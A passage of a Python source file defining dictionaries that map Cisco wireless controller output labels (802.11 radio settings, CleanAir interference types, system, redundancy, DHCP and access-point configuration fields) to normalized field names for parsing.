'MCS 18': 'd_802_11n_mcs_settings_mcs_18',\n 'MCS 19': 'd_802_11n_mcs_settings_mcs_19',\n 'MCS 20': 'd_802_11n_mcs_settings_mcs_20',\n 'MCS 21': 'd_802_11n_mcs_settings_mcs_21',\n 'MCS 22': 'd_802_11n_mcs_settings_mcs_22',\n 'MCS 23': 'd_802_11n_mcs_settings_mcs_23',\n 'MCS 24': 'd_802_11n_mcs_settings_mcs_24',\n 'MCS 25': 'd_802_11n_mcs_settings_mcs_25',\n 'MCS 26': 'd_802_11n_mcs_settings_mcs_26',\n 'MCS 27': 'd_802_11n_mcs_settings_mcs_27',\n 'MCS 28': 'd_802_11n_mcs_settings_mcs_28',\n 'MCS 29': 'd_802_11n_mcs_settings_mcs_29',\n 'MCS 30': 'd_802_11n_mcs_settings_mcs_30',\n 'MCS 31': 'd_802_11n_mcs_settings_mcs_31',\n '802.11n Status:': 'd_802_11n_status',\n 'A-MPDU Tx:': 'd_802_11n_status_a_mpdu_tx',\n 'Priority 0': 'd_802_11n_status_a_mpdu_tx_priority_0',\n 'Priority 1': 'd_802_11n_status_a_mpdu_tx_priority_1',\n 'Priority 2': 'd_802_11n_status_a_mpdu_tx_priority_2',\n 'Priority 3': 'd_802_11n_status_a_mpdu_tx_priority_3',\n 'Priority 4': 'd_802_11n_status_a_mpdu_tx_priority_4',\n 'Priority 5': 'd_802_11n_status_a_mpdu_tx_priority_5',\n 'Priority 6': 'd_802_11n_status_a_mpdu_tx_priority_6',\n 'Priority 7': 'd_802_11n_status_a_mpdu_tx_priority_7',\n 'Aggregation scheduler': 'd_802_11n_status_a_mpdu_tx_aggregation_scheduler',\n 'Realtime Timeout': 'd_802_11n_status_a_mpdu_tx_aggregation_scheduler_realtime_timeout',\n 'Non Realtime Timeout': 
'd_802_11n_status_a_mpdu_tx_aggregation_scheduler_non_realtime_timeout',\n 'A-MSDU Tx:': 'd_802_11n_status_a_msdu_tx',\n 'Priority 01': 'd_802_11n_status_a_msdu_tx_priority_0',\n 'Priority 11': 'd_802_11n_status_a_msdu_tx_priority_1',\n 'Priority 21': 'd_802_11n_status_a_msdu_tx_priority_2',\n 'Priority 31': 'd_802_11n_status_a_msdu_tx_priority_3',\n 'Priority 41': 'd_802_11n_status_a_msdu_tx_priority_4',\n 'Priority 51': 'd_802_11n_status_a_msdu_tx_priority_5',\n 'Priority 61': 'd_802_11n_status_a_msdu_tx_priority_6',\n 'Priority 71': 'd_802_11n_status_a_msdu_tx_priority_7',\n 'A-MSDU Max Subframes': 'd_802_11n_status_a_msdu_max_subframes',\n 'A-MSDU MAX Length': 'd_802_11n_status_a_msdu_max_length',\n 'Rifs Rx': 'd_802_11n_status_rifs_rx',\n 'Guard Interval': 'd_802_11n_status_guard_interval',\n 'Beacon Interval': 'beacon_interval',\n 'CF Pollable mode': 'cf_pollable_mode',\n 'CF Poll Request mandatory': 'cf_poll_request_mandatory',\n 'CFP Period': 'cfp_period',\n 'CFP Maximum Duration': 'cfp_maximum_duration',\n 'Default Channel': 'default_channel',\n 'Default Tx Power Level': 'default_tx_power_level',\n 'DTPC Status': 'dtpc_status',\n 'RSSI Low Check': 'rssi_low_check',\n 'RSSI Threshold': 'rssi_threshold',\n 'Call Admission Limit': 'call_admission_limit',\n 'G711 CU Quantum': 'g711_cu_quantum',\n 'ED Threshold': 'ed_threshold',\n 'Fragmentation Threshold': 'fragmentation_threshold',\n 'PBCC mandatory': 'pbcc_mandatory',\n 'RTS Threshold': 'rts_threshold',\n 'Short Preamble mandatory': 'short_preamble_mandatory',\n 'Short Retry Limit': 'short_retry_limit',\n 'Legacy Tx Beamforming setting': 'legacy_tx_beamforming_setting',\n 'Traffic Stream Metrics Status': 'traffic_stream_metrics_status',\n 'Expedited BW Request Status': 'expedited_bw_request_status',\n 'World Mode': 'world_mode',\n 'Faster Carrier Tracking Loop': 'faster_carrier_tracking_loop',\n 'EDCA profile type': 'edca_profile_type',\n 'Voice MAC optimization status': 'voice_mac_optimization_status',\n 'Call Admission Control (CAC) configuration': 'call_admission_control_cac_configuration',\n 'Voice AC - Admission control (ACM)': 'call_admission_control_cac_configuration_voice_ac_admission_control_acm',\n 'Voice Stream-Size': 'call_admission_control_cac_configuration_voice_stream_size',\n 'Voice Max-Streams': 'call_admission_control_cac_configuration_voice_max_streams',\n 'Voice max RF bandwidth': 'call_admission_control_cac_configuration_voice_max_rf_bandwidth',\n 'Voice reserved roaming bandwidth': 'call_admission_control_cac_configuration_voice_reserved_roaming_bandwidth',\n 'Voice CAC Method': 'call_admission_control_cac_configuration_voice_cac_method',\n 'Voice tspec inactivity timeout': 'call_admission_control_cac_configuration_voice_tspec_inactivity_timeout',\n 'CAC SIP-Voice configuration': 'cac_sip_voice_configuration',\n 'SIP based CAC': 'cac_sip_voice_configuration_sip_based_cac',\n 'SIP Codec Type': 'cac_sip_voice_configuration_sip_codec_type',\n 'SIP call bandwidth:': 'cac_sip_voice_configuration_sip_call_bandwidth',\n 'SIP call bandwidth sample-size': 'cac_sip_voice_configuration_sip_call_bandwidth_sample_size',\n 'Video AC - Admission control (ACM)': 'cac_sip_voice_configuration_video_ac_admission_control_acm',\n 'Video max RF bandwidth': 'cac_sip_voice_configuration_video_max_rf_bandwidth',\n 'Video reserved roaming bandwidth': 'cac_sip_voice_configuration_video_reserved_roaming_bandwidth',\n 'Video load-based CAC mode': 'cac_sip_voice_configuration_video_load_based_cac_mode',\n 'Video CAC Method': 
'cac_sip_voice_configuration_video_cac_method',\n 'CAC SIP-Video configuration': 'cac_sip_video_configuration',\n 'SIP based CAC1': 'cac_sip_video_configuration_sip_based_cac',\n 'Best-effort AC - Admission control (ACM)': 'cac_sip_video_configuration_best_effort_ac_admission_control_acm',\n 'Background AC - Admission control (ACM)': 'cac_sip_video_configuration_background_ac_admission_control_acm',\n 'Maximum Number of Clients per AP': 'maximum_number_of_clients_per_ap',\n 'L2Roam 802.11bg RF Parameters': 'l2roam_802_11bg_rf_parameters',\n 'Config Mode': 'l2roam_802_11bg_rf_parameters_config_mode',\n 'Minimum RSSI': 'l2roam_802_11bg_rf_parameters_minimum_rssi',\n 'Roam Hysteresis': 'l2roam_802_11bg_rf_parameters_roam_hysteresis',\n 'Scan Threshold': 'l2roam_802_11bg_rf_parameters_scan_threshold',\n 'Transition time': 'l2roam_802_11bg_rf_parameters_transition_time',\n}\n\nband_5_parsing_dict = {\n '802.11a Network': 'd_802_11a_network',\n '11acSupport': 'd_11acsupport',\n '11nSupport': 'd_11nsupport',\n '802.11a Low Band': 'd_11nsupport_802_11a_low_band',\n '802.11a Mid Band': 'd_11nsupport_802_11a_mid_band',\n '802.11a High Band': 'd_11nsupport_802_11a_high_band',\n '802.11a Operational Rates': 'd_802_11a_operational_rates',\n '802.11a 6M Rate': 'd_802_11a_operational_rates_802_11a_6m_rate',\n '802.11a 9M Rate': 'd_802_11a_operational_rates_802_11a_9m_rate',\n '802.11a 12M Rate': 'd_802_11a_operational_rates_802_11a_12m_rate',\n '802.11a 18M Rate': 'd_802_11a_operational_rates_802_11a_18m_rate',\n '802.11a 24M Rate': 'd_802_11a_operational_rates_802_11a_24m_rate',\n '802.11a 36M Rate': 'd_802_11a_operational_rates_802_11a_36m_rate',\n '802.11a 48M Rate': 'd_802_11a_operational_rates_802_11a_48m_rate',\n '802.11a 54M Rate': 'd_802_11a_operational_rates_802_11a_54m_rate',\n '802.11n MCS Settings:': 'd_802_11n_mcs_settings',\n 'MCS 0': 'd_802_11n_mcs_settings_mcs_0',\n 'MCS 1': 'd_802_11n_mcs_settings_mcs_1',\n 'MCS 2': 'd_802_11n_mcs_settings_mcs_2',\n 'MCS 3': 'd_802_11n_mcs_settings_mcs_3',\n 'MCS 4': 'd_802_11n_mcs_settings_mcs_4',\n 'MCS 5': 'd_802_11n_mcs_settings_mcs_5',\n 'MCS 6': 'd_802_11n_mcs_settings_mcs_6',\n 'MCS 7': 'd_802_11n_mcs_settings_mcs_7',\n 'MCS 8': 'd_802_11n_mcs_settings_mcs_8',\n 'MCS 9': 'd_802_11n_mcs_settings_mcs_9',\n 'MCS 10': 'd_802_11n_mcs_settings_mcs_10',\n 'MCS 11': 'd_802_11n_mcs_settings_mcs_11',\n 'MCS 12': 'd_802_11n_mcs_settings_mcs_12',\n 'MCS 13': 'd_802_11n_mcs_settings_mcs_13',\n 'MCS 14': 'd_802_11n_mcs_settings_mcs_14',\n 'MCS 15': 'd_802_11n_mcs_settings_mcs_15',\n 'MCS 16': 'd_802_11n_mcs_settings_mcs_16',\n 'MCS 17': 'd_802_11n_mcs_settings_mcs_17',\n 'MCS 18': 'd_802_11n_mcs_settings_mcs_18',\n 'MCS 19': 'd_802_11n_mcs_settings_mcs_19',\n 'MCS 20': 'd_802_11n_mcs_settings_mcs_20',\n 'MCS 21': 'd_802_11n_mcs_settings_mcs_21',\n 'MCS 22': 'd_802_11n_mcs_settings_mcs_22',\n 'MCS 23': 'd_802_11n_mcs_settings_mcs_23',\n 'MCS 24': 'd_802_11n_mcs_settings_mcs_24',\n 'MCS 25': 'd_802_11n_mcs_settings_mcs_25',\n 'MCS 26': 'd_802_11n_mcs_settings_mcs_26',\n 'MCS 27': 'd_802_11n_mcs_settings_mcs_27',\n 'MCS 28': 'd_802_11n_mcs_settings_mcs_28',\n 'MCS 29': 'd_802_11n_mcs_settings_mcs_29',\n 'MCS 30': 'd_802_11n_mcs_settings_mcs_30',\n 'MCS 31': 'd_802_11n_mcs_settings_mcs_31',\n '802.11ac MCS Settings:': 'd_802_11ac_mcs_settings',\n 'Nss=1: MCS 0-9': 'd_802_11ac_mcs_settings_nss_1_mcs_0_9',\n 'Nss=2: MCS 0-9': 'd_802_11ac_mcs_settings_nss_2_mcs_0_9',\n 'Nss=3: MCS 0-9': 'd_802_11ac_mcs_settings_nss_3_mcs_0_9',\n 'Nss=4: MCS 0-7': 
'd_802_11ac_mcs_settings_nss_4_mcs_0_7',\n 'Nss=4: MCS 0-9': 'd_802_11ac_mcs_settings_nss_4_mcs_0_9',\n '802.11n Status:': 'd_802_11n_status',\n 'A-MPDU Tx:': 'd_802_11n_status_a_mpdu_tx',\n 'Priority 0': 'd_802_11n_status_a_mpdu_tx_priority_0',\n 'Priority 1': 'd_802_11n_status_a_mpdu_tx_priority_1',\n 'Priority 2': 'd_802_11n_status_a_mpdu_tx_priority_2',\n 'Priority 3': 'd_802_11n_status_a_mpdu_tx_priority_3',\n 'Priority 4': 'd_802_11n_status_a_mpdu_tx_priority_4',\n 'Priority 5': 'd_802_11n_status_a_mpdu_tx_priority_5',\n 'Priority 6': 'd_802_11n_status_a_mpdu_tx_priority_6',\n 'Priority 7': 'd_802_11n_status_a_mpdu_tx_priority_7',\n 'Aggregation scheduler': 'd_802_11n_status_a_mpdu_tx_aggregation_scheduler',\n 'Frame Burst': 'd_802_11n_status_a_mpdu_tx_frame_burst',\n 'Realtime Timeout': 'd_802_11n_status_a_mpdu_tx_frame_burst_realtime_timeout',\n 'Non Realtime Timeout': 'd_802_11n_status_a_mpdu_tx_frame_burst_non_realtime_timeout',\n 'A-MSDU Tx:': 'd_802_11n_status_a_msdu_tx',\n 'Priority 01': 'd_802_11n_status_a_msdu_tx_priority_0',\n 'Priority 11': 'd_802_11n_status_a_msdu_tx_priority_1',\n 'Priority 21': 'd_802_11n_status_a_msdu_tx_priority_2',\n 'Priority 31': 'd_802_11n_status_a_msdu_tx_priority_3',\n 'Priority 41': 'd_802_11n_status_a_msdu_tx_priority_4',\n 'Priority 51': 'd_802_11n_status_a_msdu_tx_priority_5',\n 'Priority 61': 'd_802_11n_status_a_msdu_tx_priority_6',\n 'Priority 71': 'd_802_11n_status_a_msdu_tx_priority_7',\n 'A-MSDU Max Subframes': 'd_802_11n_status_a_msdu_max_subframes',\n 'A-MSDU MAX Length': 'd_802_11n_status_a_msdu_max_length',\n 'Rifs Rx': 'd_802_11n_status_rifs_rx',\n 'Guard Interval': 'd_802_11n_status_guard_interval',\n 'Beacon Interval': 'beacon_interval',\n 'CF Pollable mandatory': 'cf_pollable_mandatory',\n 'CF Poll Request mandatory': 'cf_poll_request_mandatory',\n 'CFP Period': 'cfp_period',\n 'CFP Maximum Duration': 'cfp_maximum_duration',\n 'Default Channel': 'default_channel',\n 'Default Tx Power Level': 'default_tx_power_level',\n 'DTPC Status': 'dtpc_status',\n 'Fragmentation Threshold': 'fragmentation_threshold',\n 'RSSI Low Check': 'rssi_low_check',\n 'RSSI Threshold': 'rssi_threshold',\n 'TI Threshold': 'ti_threshold',\n 'Legacy Tx Beamforming setting': 'legacy_tx_beamforming_setting',\n 'Traffic Stream Metrics Status': 'traffic_stream_metrics_status',\n 'Expedited BW Request Status': 'expedited_bw_request_status',\n 'World Mode': 'world_mode',\n 'dfs-peakdetect': 'dfs_peakdetect',\n 'EDCA profile type': 'edca_profile_type',\n 'Voice MAC optimization status': 'voice_mac_optimization_status',\n 'Call Admission Control (CAC) configuration': 'call_admission_control_cac_configuration',\n 'Voice AC:': 'voice_ac',\n 'Voice AC - Admission control (ACM)': 'voice_ac_voice_ac_admission_control_acm',\n 'Voice Stream-Size': 'voice_ac_voice_stream_size',\n 'Voice Max-Streams': 'voice_ac_voice_max_streams',\n 'Voice max RF bandwidth': 'voice_ac_voice_max_rf_bandwidth',\n 'Voice reserved roaming bandwidth': 'voice_ac_voice_reserved_roaming_bandwidth',\n 'Voice CAC Method': 'voice_ac_voice_cac_method',\n 'Voice tspec inactivity timeout': 'voice_ac_voice_tspec_inactivity_timeout',\n 'CAC SIP-Voice configuration': 'cac_sip_voice_configuration',\n 'SIP based CAC': 'cac_sip_voice_configuration_sip_based_cac',\n 'SIP Codec Type': 'cac_sip_voice_configuration_sip_codec_type',\n 'SIP call bandwidth': 'cac_sip_voice_configuration_sip_call_bandwidth',\n 'SIP call bandwith sample-size': 'cac_sip_voice_configuration_sip_call_bandwith_sample_size',\n 'Video AC:': 
'video_ac',\n 'Video AC - Admission control (ACM)': 'video_ac_video_ac_admission_control_acm',\n 'Video max RF bandwidth': 'video_ac_video_max_rf_bandwidth',\n 'Video reserved roaming bandwidth': 'video_ac_video_reserved_roaming_bandwidth',\n 'Video load-based CAC mode': 'video_ac_video_load_based_cac_mode',\n 'Video CAC Method': 'video_ac_video_cac_method',\n 'CAC SIP-Video Configuration': 'cac_sip_video_configuration',\n 'SIP based CAC1': 'cac_sip_video_configuration_sip_based_cac',\n 'Best-effort AC - Admission control (ACM)': 'cac_sip_video_configuration_best_effort_ac_admission_control_acm',\n 'Background AC - Admission control (ACM)': 'cac_sip_video_configuration_background_ac_admission_control_acm',\n 'Maximum Number of Clients per AP Radio': 'maximum_number_of_clients_per_ap_radio',\n 'L2Roam 802.11a RF Parameters': 'l2roam_802_11a_rf_parameters',\n 'Config Mode': 'l2roam_802_11a_rf_parameters_config_mode',\n 'Minimum RSSI': 'l2roam_802_11a_rf_parameters_minimum_rssi',\n 'Roam Hysteresis': 'l2roam_802_11a_rf_parameters_roam_hysteresis',\n 'Scan Threshold': 'l2roam_802_11a_rf_parameters_scan_threshold',\n 'Transition time': 'l2roam_802_11a_rf_parameters_transition_time',\n '802.11h Configuration': 'd_802_11h_configuration',\n 'Power Constraint': 'power_constraint',\n 'Channel Switch': 'channel_switch',\n 'Channel Mode': 'channel_mode',\n 'Smart DFS': 'smart_dfs',\n}\n\ncleanair_5g_parsing_dict = {\n 'Clean Air Solution': 'clean_air_solution',\n 'Air Quality Settings:': 'air_quality_settings',\n 'Air Quality Reporting': 'air_quality_settings_air_quality_reporting',\n 'Air Quality Reporting Period (min)': 'air_quality_settings_air_quality_reporting_period_min',\n 'Air Quality Alarms': 'air_quality_settings_air_quality_alarms',\n 'Air Quality Alarm Threshold': 'air_quality_settings_air_quality_alarms_air_quality_alarm_threshold',\n 'Unclassified Interference': 'air_quality_settings_air_quality_alarms_unclassified_interference',\n 'Unclassified Severity Threshold': 'air_quality_settings_air_quality_alarms_unclassified_severity_threshold',\n 'Interference Device Reporting': 'air_quality_settings_interference_device_reporting',\n 'Interference Device Types:': 'air_quality_settings_interference_device_types',\n 'TDD Transmitter': 'air_quality_settings_interference_device_types_tdd_transmitter',\n 'Jammer': 'air_quality_settings_interference_device_types_jammer',\n 'Continuous Transmitter': 'air_quality_settings_interference_device_types_continuous_transmitter',\n 'DECT-like Phone': 'air_quality_settings_interference_device_types_dect_like_phone',\n 'Video Camera': 'air_quality_settings_interference_device_types_video_camera',\n 'WiFi Inverted': 'air_quality_settings_interference_device_types_wifi_inverted',\n 'WiFi Invalid Channel': 'air_quality_settings_interference_device_types_wifi_invalid_channel',\n 'SuperAG': 'air_quality_settings_interference_device_types_superag',\n 'Canopy': 'air_quality_settings_interference_device_types_canopy',\n 'WiMax Mobile': 'air_quality_settings_interference_device_types_wimax_mobile',\n 'WiMax Fixed': 'air_quality_settings_interference_device_types_wimax_fixed',\n 'Interference Device Alarms': 'air_quality_settings_interference_device_alarms',\n 'Interference Device Types Triggering Alarms:': 'air_quality_settings_interference_device_types_triggering_alarms',\n 'TDD Transmitter1': 'air_quality_settings_interference_device_types_triggering_alarms_tdd_transmitter',\n 'Jammer1': 'air_quality_settings_interference_device_types_triggering_alarms_jammer',\n 
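# Keys correspond verbatim to labels in the controller output; a trailing '1' marks\n    # the second occurrence of a repeated label (the 'Triggering Alarms' block repeats\n    # the device-type names printed earlier in the same output).\n    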
'Continuous Transmitter1': 'air_quality_settings_interference_device_types_triggering_alarms_continuous_transmitter',\n 'DECT-like Phone1': 'air_quality_settings_interference_device_types_triggering_alarms_dect_like_phone',\n 'Video Camera1': 'air_quality_settings_interference_device_types_triggering_alarms_video_camera',\n 'WiFi Inverted1': 'air_quality_settings_interference_device_types_triggering_alarms_wifi_inverted',\n 'WiFi Invalid Channel1': 'air_quality_settings_interference_device_types_triggering_alarms_wifi_invalid_channel',\n 'SuperAG1': 'air_quality_settings_interference_device_types_triggering_alarms_superag',\n 'Canopy1': 'air_quality_settings_interference_device_types_triggering_alarms_canopy',\n 'WiMax Mobile1': 'air_quality_settings_interference_device_types_triggering_alarms_wimax_mobile',\n 'WiMax Fixed1': 'air_quality_settings_interference_device_types_triggering_alarms_wimax_fixed',\n 'Additional Clean Air Settings:': 'additional_clean_air_settings',\n 'CleanAir ED-RRM State': 'additional_clean_air_settings_cleanair_ed_rrm_state',\n 'CleanAir ED-RRM Sensitivity': 'additional_clean_air_settings_cleanair_ed_rrm_sensitivity',\n 'CleanAir ED-RRM Custom Threshold': 'additional_clean_air_settings_cleanair_ed_rrm_custom_threshold',\n 'CleanAir Rogue Contribution': 'additional_clean_air_settings_cleanair_rogue_contribution',\n 'CleanAir Rogue Duty-Cycle Threshold': 'additional_clean_air_settings_cleanair_rogue_duty_cycle_threshold',\n 'CleanAir Persistent Devices state': 'additional_clean_air_settings_cleanair_persistent_devices_state',\n 'CleanAir Persistent Device Propagation': 'additional_clean_air_settings_cleanair_persistent_device_propagation',\n}\n\ncleanair_24g_parsing_dict = {\n 'Clean Air Solution': 'clean_air_solution',\n 'Air Quality Settings:': 'air_quality_settings',\n 'Air Quality Reporting': 'air_quality_settings_air_quality_reporting',\n 'Air Quality Reporting Period (min)': 'air_quality_settings_air_quality_reporting_period_min',\n 'Air Quality Alarms': 'air_quality_settings_air_quality_alarms',\n 'Air Quality Alarm Threshold': 'air_quality_settings_air_quality_alarms_air_quality_alarm_threshold',\n 'Unclassified Interference': 'air_quality_settings_air_quality_alarms_unclassified_interference',\n 'Unclassified Severity Threshold': 'air_quality_settings_air_quality_alarms_unclassified_severity_threshold',\n 'Interference Device Reporting': 'air_quality_settings_interference_device_reporting',\n 'Interference Device Types:': 'air_quality_settings_interference_device_types',\n 'Bluetooth Link': 'air_quality_settings_interference_device_types_bluetooth_link',\n 'Microwave Oven': 'air_quality_settings_interference_device_types_microwave_oven',\n '802.11 FH': 'air_quality_settings_interference_device_types_802_11_fh',\n 'Bluetooth Discovery': 'air_quality_settings_interference_device_types_bluetooth_discovery',\n 'TDD Transmitter': 'air_quality_settings_interference_device_types_tdd_transmitter',\n 'Jammer': 'air_quality_settings_interference_device_types_jammer',\n 'Continuous Transmitter': 'air_quality_settings_interference_device_types_continuous_transmitter',\n 'DECT-like Phone': 'air_quality_settings_interference_device_types_dect_like_phone',\n 'Video Camera': 'air_quality_settings_interference_device_types_video_camera',\n '802.15.4': 'air_quality_settings_interference_device_types_802_15_4',\n 'WiFi Inverted': 'air_quality_settings_interference_device_types_wifi_inverted',\n 'WiFi Invalid Channel': 
'air_quality_settings_interference_device_types_wifi_invalid_channel',\n 'SuperAG': 'air_quality_settings_interference_device_types_superag',\n 'Canopy': 'air_quality_settings_interference_device_types_canopy',\n 'Microsoft Device': 'air_quality_settings_interference_device_types_microsoft_device',\n 'WiMax Mobile': 'air_quality_settings_interference_device_types_wimax_mobile',\n 'WiMax Fixed': 'air_quality_settings_interference_device_types_wimax_fixed',\n 'BLE Beacon': 'air_quality_settings_interference_device_types_ble_beacon',\n 'Interference Device Alarms': 'air_quality_settings_interference_device_alarms',\n 'Interference Device Types Triggering Alarms:': 'air_quality_settings_interference_device_types_triggering_alarms',\n 'Bluetooth Link1': 'air_quality_settings_interference_device_types_triggering_alarms_bluetooth_link',\n 'Microwave Oven1': 'air_quality_settings_interference_device_types_triggering_alarms_microwave_oven',\n '802.11 FH1': 'air_quality_settings_interference_device_types_triggering_alarms_802_11_fh',\n 'Bluetooth Discovery1': 'air_quality_settings_interference_device_types_triggering_alarms_bluetooth_discovery',\n 'TDD Transmitter1': 'air_quality_settings_interference_device_types_triggering_alarms_tdd_transmitter',\n 'Jammer1': 'air_quality_settings_interference_device_types_triggering_alarms_jammer',\n 'Continuous Transmitter1': 'air_quality_settings_interference_device_types_triggering_alarms_continuous_transmitter',\n 'DECT-like Phone1': 'air_quality_settings_interference_device_types_triggering_alarms_dect_like_phone',\n 'Video Camera1': 'air_quality_settings_interference_device_types_triggering_alarms_video_camera',\n '802.15.41': 'air_quality_settings_interference_device_types_triggering_alarms_802_15_4',\n 'WiFi Inverted1': 'air_quality_settings_interference_device_types_triggering_alarms_wifi_inverted',\n 'WiFi Invalid Channel1': 'air_quality_settings_interference_device_types_triggering_alarms_wifi_invalid_channel',\n 'SuperAG1': 'air_quality_settings_interference_device_types_triggering_alarms_superag',\n 'Canopy1': 'air_quality_settings_interference_device_types_triggering_alarms_canopy',\n 'Microsoft Device1': 'air_quality_settings_interference_device_types_triggering_alarms_microsoft_device',\n 'WiMax Mobile1': 'air_quality_settings_interference_device_types_triggering_alarms_wimax_mobile',\n 'WiMax Fixed1': 'air_quality_settings_interference_device_types_triggering_alarms_wimax_fixed',\n 'BLE Beacon1': 'air_quality_settings_interference_device_types_triggering_alarms_ble_beacon',\n 'Additional Clean Air Settings:': 'additional_clean_air_settings',\n 'CleanAir ED-RRM State': 'additional_clean_air_settings_cleanair_ed_rrm_state',\n 'CleanAir ED-RRM Sensitivity': 'additional_clean_air_settings_cleanair_ed_rrm_sensitivity',\n 'CleanAir ED-RRM Custom Threshold': 'additional_clean_air_settings_cleanair_ed_rrm_custom_threshold',\n 'CleanAir Rogue Contribution': 'additional_clean_air_settings_cleanair_rogue_contribution',\n 'CleanAir Rogue Duty-Cycle Threshold': 'additional_clean_air_settings_cleanair_rogue_duty_cycle_threshold',\n 'CleanAir Persistent Devices state': 'additional_clean_air_settings_cleanair_persistent_devices_state',\n 'CleanAir Persistent Device Propagation': 'additional_clean_air_settings_cleanair_persistent_device_propagation',\n}\n\nsystem_info_parsing_dict = {\n 'Burned-in MAC Address': 'burned_in_mac_address',\n 'Maximum number of APs supported': 'maximum_number_of_aps_supported',\n 'System Information': 'system_information',\n 
'Manufacturer': 'manufacturers_name',\n 'Product Name': 'product_name',\n 'Build Info': 'build_info',\n 'Product Version': 'product_version',\n 'RTOS Version': 'rtos_version',\n 'Bootloader Version': 'bootloader_version',\n 'Emergency Image Version': 'emergency_image_version',\n 'Field Recovery Image Version': 'field_recovery_image_version',\n 'Firmware Version': 'firmware_version',\n 'OUI File Update Time': 'oui_file_update_time',\n 'Build Type': 'build_type',\n 'OUI File Last Update Time': 'oui_file_last_update_time',\n 'Build Type1': 'build_type',\n 'System Name': 'system_name',\n 'System Location': 'system_location',\n 'System Contact': 'system_contact',\n 'System ObjectID': 'system_objectid',\n 'Redundancy Mode': 'redundancy_mode',\n 'IP Address': 'ip_address',\n 'IPv6 Address': 'ipv6_address',\n 'Last Reset': 'last_reset',\n 'System Up Time': 'system_up_time',\n 'System Timezone Location': 'system_timezone_location',\n 'System Stats Realtime Interval': 'system_stats_realtime_interval',\n 'System Stats Normal Interval': 'system_stats_normal_interval',\n 'Configured Country': 'configured_country',\n 'Operating Environment': 'operating_environment',\n 'Internal Temp Alarm Limits': 'internal_temp_alarm_limits',\n 'Internal Temperature': 'internal_temperature',\n 'Mgig Temp Alarm Limits': 'mgig_temp_alarm_limits',\n 'Mgig Temperature': 'mgig_temperature',\n 'External Temp Alarm Limits': 'external_temp_alarm_limits',\n 'External Temperature': 'external_temperature',\n 'Fan Status': 'fan_status',\n 'Fan Speed Mode': 'fan_speed_mode',\n 'Power Supply 1': 'power_supply_1',\n 'Power Supply 2': 'power_supply_2',\n 'State of 802.11b Network': 'state_of_802_11b_network',\n 'State of 802.11a Network': 'state_of_802_11a_network',\n 'Number of WLANs': 'number_of_wlans',\n 'Number of Active Clients': 'number_of_active_clients',\n 'OUI Classification Failure Count': 'oui_classification_failure_count',\n 'Memory Current Usage': 'memory_current_usage',\n 'Memory Average Usage': 'memory_average_usage',\n 'CPU Current Usage': 'cpu_current_usage',\n 'CPU Average Usage': 'cpu_average_usage',\n 'Flash Type': 'flash_type',\n 'Flash Size': 'flash_size',\n 'Maximum number of APs supported1': 'maximum_number_of_aps_supported',\n 'System Nas-Id': 'system_nas_id',\n 'WLC MIC Certificate Types': 'wlc_mic_certificate_types',\n 'Licensing Type': 'licensing_type',\n 'USB': 'licensing_type_usb',\n 'Backup Controller Configuration': 'backup_controller_configuration',\n 'AP primary Backup Controller': 'ap_primary_backup_controller',\n 'AP secondary Backup Controller': 'ap_secondary_backup_controller',\n 'Drive 0': 'raid_drive_0',\n 'Drive 1': 'raid_drive_1',\n}\n\nredundancy_mode_parsing_dict = {\n 'Redundancy Mode': 'redundancy_mode',\n 'Local State': 'local_state',\n 'Peer State': 'peer_state',\n 'Unit': 'unit',\n 'Unit ID': 'unit_id',\n 'Redunadancy State': 'redundancy_state', # Spelling error in some SW versions\n 'Redundancy State': 'redundancy_state',\n 'Mobility MAC': 'mobility_mac',\n 'Redundancy Management IP Address': 'redundancy_management_ip_address',\n 'Peer Redundancy Management IP Address': 'peer_redundancy_management_ip_address',\n 'Redundancy Port IP Address': 'redundancy_port_ip_address',\n 'Peer Redundancy Port IP Address': 'peer_redundancy_port_ip_address',\n 'Peer Service Port IP Address': 'peer_service_port_ip_address',\n}\n\ndhcp_server_parsing_dict = {\n 'DHCP Server IP Address:': 'ip_address',\n 'DHCP RX DISCOVER Count:': 'dhcp_rx_discover_count',\n 'DHCP TX DISCOVER Count:': 
'dhcp_tx_discover_count',\n 'DHCP ACK Count:': 'dhcp_ack_count',\n 'DHCP REQUEST Count:': 'dhcp_request_count',\n 'DHCP INFORM Count:': 'dhcp_inform_count',\n 'DHCP DECLINE Count:': 'dhcp_decline_count',\n 'DHCP RELEASE Count:': 'dhcp_release_count',\n 'DHCP REPLY Count:': 'dhcp_reply_count',\n 'DHCP OFFER Count:': 'dhcp_offer_count',\n 'DHCP NAK Count:': 'dhcp_nak_count',\n 'Tx Fails:': 'tx_fails',\n 'Last Rx Time:': 'last_rx_time',\n 'Last Tx Time:': 'last_tx_time',\n}\n\nnearby_aps_parsing_dict = {\n 'Nearby AP': 'channel',\n}\n\nap_config_parsing_dict = {\n 'Cisco AP Identifier': 'cisco_ap_identifier',\n 'Cisco AP Name': 'cisco_ap_name',\n 'Country code': 'country_code',\n 'Regulatory Domain allowed by Country': 'regulatory_domain_allowed_by_country',\n 'AP Country code': 'ap_country_code',\n 'Wireless Logging State': 'wireless_logging_state',\n 'AP Regulatory Domain': 'ap_regulatory_domain',\n 'Switch Port Number': 'switch_port_number',\n 'MAC Address': 'mac_address',\n 'IP Address Configuration': 'ip_address_configuration',\n 'IP Address': 'ip_address',\n 'IP NetMask': 'ip_netmask',\n 'Gateway IP Addr': 'gateway_ip_addr',\n 'NAT External IP Address': 'nat_external_ip_address',\n 'CAPWAP Path MTU': 'capwap_path_mtu',\n 'DHCP Release Override': 'dhcp_release_override',\n 'Telnet State': 'telnet_state',\n 'Ssh State': 'ssh_state',\n 'Cisco AP Location': 'cisco_ap_location',\n 'Cisco AP Floor Label': 'cisco_ap_floor_label',\n 'Cisco AP Group Name': 'cisco_ap_group_name',\n 'Primary Cisco Switch Name': 'primary_cisco_switch_name',\n 'Primary Cisco Switch IP Address': 'primary_cisco_switch_ip_address',\n 'Secondary Cisco Switch Name': 'secondary_cisco_switch_name',\n 'Secondary Cisco Switch IP Address': 'secondary_cisco_switch_ip_address',\n 'Tertiary Cisco Switch Name': 'tertiary_cisco_switch_name',\n 'Tertiary Cisco Switch IP Address': 'tertiary_cisco_switch_ip_address',\n 'Administrative State': 'administrative_state',\n 'Operation State': 'operation_state',\n 'Mirroring Mode': 'mirroring_mode',\n 'AP Mode': 'ap_mode',\n 'Public Safety': 'public_safety',\n 'ATF Mode:': 'atf_mode',\n 'AP SubMode': 'ap_submode',\n 'Rogue Detection': 'rogue_detection',\n 'Remote AP Debug': 'remote_ap_debug',\n 'Logging trap severity level': 'logging_trap_severity_level',\n 'Logging syslog facility': 'logging_syslog_facility',\n 'S/W Version': 's_w_version',\n 'Boot Version': 